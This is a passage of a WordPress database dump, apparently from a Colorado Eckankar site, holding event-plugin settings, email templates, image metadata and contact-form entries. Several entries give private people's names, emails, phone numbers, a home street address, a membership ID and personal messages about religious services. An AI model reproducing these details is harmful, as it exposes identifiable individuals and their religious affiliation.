background-color: #6e6e6e;\" role=\"module-content\" valign=\"top\" bgcolor=\"#6e6e6e\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"></div>\r\n<figure style=\"text-align: center;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px;\">© Eckankar In Colorado -2022</span></figure>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<!-- [if mso]>\r\n                                  </td>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                                </tr>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                              </table>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                            </center>\r\n                            <![endif]--></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</center>\";}}'),(160126,266573,'mec_fields','a:0:{}'),(160086,266573,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(160085,266573,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-05-01\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-05-01\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(160084,266573,'mec_additional_location_ids','a:0:{}'),(160083,266573,'mec_additional_organizer_ids','a:0:{}'),(160080,266573,'mec_more_info_target','_self'),(160081,266573,'mec_cost',''),(160082,266573,'mec_currency','a:0:{}'),(160079,266573,'mec_more_info_title',''),(160078,266573,'mec_more_info',''),(160077,266573,'mec_read_more',''),(160074,266573,'mec_location_id','118'),(160075,266573,'mec_dont_show_map','0'),(160076,266573,'mec_organizer_id','1'),(160107,266573,'mec_repeat_type',''),(160106,266573,'mec_repeat_status','0'),(160105,266573,'mec_end_day_seconds','84600'),(160104,266573,'mec_end_time_ampm','PM'),(160103,266573,'mec_end_time_minutes','30'),(160102,266573,'mec_end_time_hour','11'),(160101,266573,'mec_end_date','2022-05-01'),(160100,266573,'mec_start_day_seconds','37800'),(160099,266573,'mec_start_time_ampm','AM'),(160098,266573,'mec_start_time_minutes','30'),(160095,266573,'mec_public','1'),(160096,266573,'mec_start_date','2022-05-01'),(160097,266573,'mec_start_time_hour','10'),(160094,266573,'mec_countdown_method','global'),(160093,266573,'mec_timezone','global'),(160092,266573,'mec_comment',''),(160088,266573,'mec_allday','0'),(160089,266573,'one_occurrence','0'),(160090,266573,'mec_hide_time','0'),(160091,266573,'mec_hide_end_time','0'),(160115,266573,'mec_hourly_schedules','a:0:{}'),(160116,266573,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(160114,266573,'mec_not_in_days',''),(160113,266573,'mec_in_days',''),(160111,266573,'mec_repeat_end_at_date',''),(160112,266573,'mec_advanced_days','a:0:{}'),(140627,264797,'passster_activate_global_protection',NULL),(140628,264797,'passster_activate_protection',NULL),(140629,264797,'passster_protection_type','password'),(160122,266573,'mec_reg_fields_global_inheritance','1'),(160121,266573,'mec_ticket_variations','a:0:{}'),(160120,266573,'mec_ticket_variations_global_inheritance','1'),(160119,266573,'mec_fees','a:0:{}'),(160118,266573,'mec_fees_global_inheritance','1'),(160117,266573,'mec_tickets','a:1:{i:1;a:17:{s:4:\"name\";s:32:\"Experience HU, The Sound of Soul\";s:22:\"ticket_start_time_hour\";s:2:\"10\";s:24:\"ticket_start_time_minute\";s:2:\"30\";s:22:\"ticket_start_time_ampm\";s:2:\"AM\";s:20:\"ticket_end_time_hour\";s:2:\"11\";s:22:\"ticket_end_time_minute\";s:2:\"30\";s:20:\"ticket_end_time_ampm\";s:2:\"PM\";s:11:\"description\";s:13:\"Register Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}}}'),(144318,265234,'_form_id','13'),(144319,265234,'_seq_num','77'),(144320,265235,'_field_97','Dennis'),(144321,265235,'_field_98','Lybeer'),(144322,265235,'_field_99','eckstudent12@gmail.com'),(144323,265235,'_field_100','(509) 202-9497'),(144324,265235,'_field_101','Other'),(144325,265235,'_field_104','RESA'),(144326,265235,'_field_105','Hello Louisa,\nI\'ve been looking online at the Colorado Eck website attempting to find out about online Light and Sound Services for a year now, and haven\'t been able to find anything about them.  Several Eckists I know have shared with me they are being held there in Colorado and that they are online events, however every time I look online, I don\'t see any Light and Sound Services listed for any of the areas in Colorado.\nAre there online Eck Light and Sound Services being held in the state of Colorado?  If so, how do I learn who to contact about getting a link to be able to attend them?\nIt\'s been some time since I\'ve heard anything about you and Gordon, so I hope the two of you are both doing very well and things are going smoothly for the two of you.\nI hope to hear from you soon Louisa!\nWith Love,\nDennis'),(144327,265235,'_form_id','10'),(144328,265235,'_seq_num','19'),(144329,264608,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(144330,264608,'passster_activate_global_protection',NULL),(144331,264608,'passster_activate_protection',NULL),(144332,264608,'passster_protection_type','password'),(144333,265237,'_wp_attached_file','2021/04/sun-on-water-1.jpg'),(144334,265237,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:632;s:6:\"height\";i:355;s:4:\"file\";s:26:\"2021/04/sun-on-water-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"sun-on-water-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"sun-on-water-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:26:\"sun-on-water-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:26:\"sun-on-water-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:26:\"sun-on-water-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:26:\"sun-on-water-1-300x355.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:355;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"sun-on-water-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(144335,265237,'original-file','2021/04/sun-on-water-1-updraft-pre-smush-original.jpg'),(144336,265237,'smush-complete','1'),(144337,265237,'smush-info','The file was compressed from 46.08 KB to 45.13 KB saving 2.06 percent using WP-Optimize'),(144338,265237,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:47184;s:12:\"smushed-size\";i:46213;s:15:\"savings-percent\";d:2.060000000000000053290705182007513940334320068359375;}'),(144339,265239,'_field_133','Leanore'),(144340,265239,'_field_134','Lehmann'),(144341,265239,'_field_135','leanurse@gmail.com'),(144342,265239,'_field_137','Email'),(144343,265239,'_field_138','Hi  requesting newsletter . Not on mailing list.\nAm member of Eckankar I’d # 2153343. Ty! May blessing b'),(144344,265239,'_form_id','13'),(144345,265239,'_seq_num','78'),(144186,265220,'mec_start_day_seconds','37800'),(144187,265220,'mec_end_date','2021-07-25'),(144188,265220,'mec_end_time_hour','11'),(144189,265220,'mec_end_time_minutes','30'),(144190,265220,'mec_end_time_ampm','AM'),(144191,265220,'mec_end_day_seconds','41400'),(144192,265220,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-07-25\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-07-25\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(144193,265220,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(144194,265220,'mec_certain_weekdays','a:0:{}'),(144195,265220,'mec_allday','0'),(144196,265220,'mec_hide_time','0'),(144197,265220,'mec_hide_end_time','0'),(144198,265220,'mec_comment',''),(144199,265220,'mec_repeat_status','0'),(144200,265220,'mec_repeat_type',''),(144201,265220,'mec_repeat_interval','1'),(144202,265220,'mec_repeat_end',''),(144203,265220,'mec_repeat_end_at_occurrences',''),(144204,265220,'mec_repeat_end_at_date',''),(144205,265220,'mec_advanced_days','a:0:{}'),(144206,265220,'mec_in_days',''),(144207,265220,'mec_not_in_days',''),(144208,265220,'mec_hourly_schedules','a:0:{}'),(144209,265220,'mec_booking','a:0:{}'),(144210,265220,'mec_tickets','a:0:{}'),(144211,265220,'mec_fees_global_inheritance','1'),(144212,265220,'mec_fees','a:0:{}'),(144213,265220,'mec_ticket_variations_global_inheritance','1'),(144214,265220,'mec_ticket_variations','a:0:{}'),(144215,265220,'mec_reg_fields_global_inheritance','1'),(144216,265220,'mec_reg_fields','a:0:{}'),(144217,265220,'mec_op','a:0:{}'),(144218,265220,'mec_event_date_submit','20210422154949'),(144219,265220,'_edit_lock','1625540693:2'),(144220,265220,'_edit_last','2'),(144221,265220,'mec_read_more',''),(144222,265220,'mec_more_info',''),(144223,265220,'mec_more_info_title',''),(144224,265220,'mec_more_info_target','_self'),(144225,265220,'mec_cost',''),(144226,265220,'mec_currency','a:0:{}'),(144227,265220,'mec_additional_organizer_ids','a:0:{}'),(144228,265220,'mec_additional_location_ids','a:0:{}'),(144229,265220,'one_occurrence','0'),(144230,265220,'mec_timezone','global'),(144231,265220,'mec_countdown_method','global'),(144232,265220,'mec_public','1'),(144233,265220,'mec_bfixed_fields','a:0:{}'),(144234,265220,'mec_fields','a:0:{}'),(144235,265220,'mec_event_status','EventScheduled'),(144236,265220,'mec_moved_online_link',''),(144237,265220,'mec_cancelled_reason',''),(144238,265220,'mec_display_cancellation_reason_in_single_page',''),(144239,265220,'_thumbnail_id','265221'),(144244,265215,'original-file','2021/07/sunset-horizon-1-updraft-pre-smush-original.jpg'),(144245,265215,'smush-complete','1'),(144246,265215,'smush-info','The file was compressed from 35.73 KB to 34.50 KB saving 3.45 percent using WP-Optimize'),(144247,265215,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:36589;s:12:\"smushed-size\";i:35326;s:15:\"savings-percent\";d:3.45000000000000017763568394002504646778106689453125;}'),(144248,265221,'_wp_attached_file','2021/07/people-2.jpg'),(144249,265221,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:634;s:6:\"height\";i:357;s:4:\"file\";s:20:\"2021/07/people-2.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"people-2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"people-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:20:\"people-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:20:\"people-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:20:\"people-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:20:\"people-2-300x357.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:357;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"people-2-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(144250,265220,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(144251,265220,'passster_activate_global_protection',NULL),(144252,265220,'passster_activate_protection',NULL),(144253,265220,'passster_protection_type','password'),(144254,265221,'original-file','2021/07/people-2-updraft-pre-smush-original.jpg'),(144255,265221,'smush-complete','1'),(144256,265221,'smush-info','The file was compressed from 43.92 KB to 42.66 KB saving 2.87 percent using WP-Optimize'),(144257,265221,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:44970;s:12:\"smushed-size\";i:43680;s:15:\"savings-percent\";d:2.87000000000000010658141036401502788066864013671875;}'),(144258,265222,'_field_179','James'),(144259,265222,'_field_180','DeLong'),(144260,265222,'_field_181','jdelongjr@gmail.com'),(144261,265222,'_field_182','CO'),(144262,265222,'_field_183','US'),(144263,265222,'_field_184','a:1:{i:0;s:41:\"Central Colorado - ECK Temple in Colorado\";}'),(144264,265222,'_form_id','17'),(144265,265222,'_seq_num','4'),(144266,265223,'_field_133','James'),(144267,265223,'_field_134','DeLong  Jr'),(144268,265223,'_field_135','jdelongjr@gmail.com'),(144269,265223,'_field_137','New address'),(144270,265223,'_field_138','I have moved to Denver from West Virginia.  My temporary address for postal service is \n5431 Uinta Way\nDenver, CO 80238\n\nWhen I establish ‘permanent’ residence I will update this information.\nThank you.'),(144271,265223,'_form_id','13'),(144272,265223,'_seq_num','75'),(144487,265243,'_field_225','Dokotho'),(144486,265243,'_field_224','Lilian'),(144313,265234,'_field_133','Anthony'),(144314,265234,'_field_134','Ardillo'),(144315,265234,'_field_135','ARDILLOJOBS@GMAIL.COM'),(144316,265234,'_field_137','Learning More about Eckankar '),(144317,265234,'_field_138','Hello, \n\nI am interested in learning more about Eckankar. Are there any events or books that you would recommend to someone new to the subject? \n\nThank you, \n\nAnthony Ardillo'),(144185,265220,'mec_start_time_ampm','AM'),(144184,265220,'mec_start_time_minutes','30'),(144183,265220,'mec_start_time_hour','10'),(144182,265220,'mec_start_date','2021-07-25'),(144179,265220,'mec_location_id','119'),(144180,265220,'mec_dont_show_map','1'),(144181,265220,'mec_organizer_id','1'),(144178,265220,'mec_color',''),(140826,264842,'popup_settings','a:39:{s:8:\"triggers\";a:1:{i:0;a:2:{s:4:\"type\";s:9:\"auto_open\";s:8:\"settings\";a:2:{s:11:\"cookie_name\";s:10:\"pum-264842\";s:5:\"delay\";i:500;}}}s:7:\"cookies\";a:1:{i:0;a:2:{s:5:\"event\";s:14:\"on_popup_close\";s:8:\"settings\";a:5:{s:4:\"name\";s:10:\"pum-264842\";s:3:\"key\";s:0:\"\";s:7:\"session\";b:0;s:4:\"time\";s:7:\"1 month\";s:4:\"path\";s:1:\"1\";}}}s:10:\"conditions\";a:1:{i:0;a:1:{i:0;a:1:{s:6:\"target\";s:13:\"is_front_page\";}}}s:8:\"theme_id\";s:4:\"2085\";s:4:\"size\";s:6:\"medium\";s:20:\"responsive_min_width\";s:2:\"0%\";s:20:\"responsive_max_width\";s:4:\"100%\";s:12:\"custom_width\";s:5:\"640px\";s:13:\"custom_height\";s:5:\"380px\";s:14:\"animation_type\";s:4:\"fade\";s:15:\"animation_speed\";s:3:\"350\";s:16:\"animation_origin\";s:10:\"center top\";s:10:\"open_sound\";s:4:\"none\";s:12:\"custom_sound\";s:0:\"\";s:8:\"location\";s:6:\"center\";s:12:\"position_top\";s:3:\"100\";s:15:\"position_bottom\";s:1:\"0\";s:13:\"position_left\";s:1:\"0\";s:14:\"position_right\";s:1:\"0\";s:6:\"zindex\";s:10:\"1999999999\";s:10:\"close_text\";s:0:\"\";s:18:\"close_button_delay\";s:1:\"0\";s:30:\"close_on_form_submission_delay\";s:1:\"0\";s:17:\"disable_on_mobile\";b:0;s:17:\"disable_on_tablet\";b:0;s:18:\"custom_height_auto\";b:0;s:18:\"scrollable_content\";b:0;s:21:\"position_from_trigger\";b:0;s:14:\"position_fixed\";b:0;s:16:\"overlay_disabled\";b:0;s:9:\"stackable\";b:0;s:18:\"disable_reposition\";b:0;s:24:\"close_on_form_submission\";b:0;s:22:\"close_on_overlay_click\";b:0;s:18:\"close_on_esc_press\";b:0;s:17:\"close_on_f4_press\";b:0;s:19:\"disable_form_reopen\";b:0;s:21:\"disable_accessibility\";b:0;s:10:\"theme_slug\";s:13:\"default-theme\";}'),(143873,265197,'_field_30','Kelly'),(143874,265197,'_field_31','Walker'),(143875,265197,'_field_32','(303) 306-8880'),(143876,265197,'_field_33','kellywinfo@gmail.com'),(140823,264842,'protect_children',''),(140824,264842,'popup_title','Our Spring Sale Has Started'),(140825,264842,'enabled','1'),(142019,264957,'_wp_attached_file','2021/05/butterfly-flower-1.jpg'),(144177,265220,'protect_children',''),(144176,265220,'protect_children',''),(144175,265217,'passster_protection_type','password'),(144174,265217,'passster_activate_protection',NULL),(144172,265217,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(144173,265217,'passster_activate_global_protection',NULL),(143337,79666,'mec_location_id','0'),(143338,79666,'mec_additional_location_ids','a:0:{}'),(143339,79666,'mec_organizer_id','0'),(143340,79666,'mec_additional_organizer_ids','a:0:{}'),(143341,79666,'passster_activate_global_protection',NULL),(144143,265217,'mec_ticket_variations_global_inheritance','1'),(144144,265217,'mec_ticket_variations','a:0:{}'),(144145,265217,'mec_reg_fields_global_inheritance','1'),(144146,265217,'mec_reg_fields','a:0:{}'),(144147,265217,'mec_op','a:0:{}'),(144148,265217,'mec_event_date_submit','20210422154949'),(144149,265217,'_edit_lock','1625540342:2'),(144150,265217,'_edit_last','2'),(144151,265217,'mec_read_more',''),(144152,265217,'mec_more_info',''),(144153,265217,'mec_more_info_title',''),(144154,265217,'mec_more_info_target','_self'),(144155,265217,'mec_cost',''),(144156,265217,'mec_currency','a:0:{}'),(144157,265217,'mec_additional_organizer_ids','a:0:{}'),(144158,265217,'mec_additional_location_ids','a:0:{}'),(144159,265217,'one_occurrence','0'),(144160,265217,'mec_timezone','global'),(144161,265217,'mec_countdown_method','global'),(144162,265217,'mec_public','1'),(144163,265217,'mec_bfixed_fields','a:0:{}'),(144164,265217,'mec_fields','a:0:{}'),(144165,265217,'mec_event_status','EventScheduled'),(144166,265217,'mec_moved_online_link',''),(144167,265217,'mec_cancelled_reason',''),(144168,265217,'mec_display_cancellation_reason_in_single_page',''),(156536,266399,'_thumbnail_id','266400'),(140827,264842,'data_version','3'),(140828,264842,'popup_open_count','0'),(140829,264842,'popup_conversion_count','0'),(144103,265216,'_field_404','judyanneanderson28@gmail.com'),(144102,265216,'_field_403','Anderson'),(144101,265216,'_field_402','judy'),(144100,265214,'passster_protection_type','password'),(144099,265214,'passster_activate_protection',NULL),(144097,265214,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br 